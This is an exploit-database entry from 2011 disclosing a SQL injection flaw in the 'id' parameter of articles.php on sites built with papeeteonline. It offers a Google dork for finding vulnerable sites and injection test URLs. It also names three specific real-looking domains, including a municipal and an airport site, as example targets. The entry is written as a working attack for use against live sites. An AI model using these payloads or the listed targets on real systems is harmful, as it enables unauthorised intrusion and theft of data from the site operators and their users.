id: 15943
date: 04/26/2011
title: papeeteonline(articles.php) SQL Injection Vulnerability
author: Kalashinkov3
cves: 

##############################################################################
# Title : Powered by papeeteonline(articles.php) SQL Injection Vulnerability
#
# Author: Kalashinkov3
#
# Email : kalashinkov3@Hotmail.fr
#
# date : 24/04/2011
#
# Google Dork : intext:intext:poweredby papeeteonline.com 
#                
# category  : PHP [SQli]
#       
###############################################################################

*SQL injection Vulnerability*

# http://[localhost]/articles.php?id=3'
# http://[localhost]/articles.php?id=[SQLI]



=========================================
# Greets To :  All Algerians Hacker'S ;)#
=========================================

Example : http://www.ville-papeete.pf/articles.php?id=266'
          http://www.consommation.pf/articles.php?id=333'
          http://www.tahiti-aeroport.pf/articles.php?id=51' 



#  0day.today [2023-03-25]  #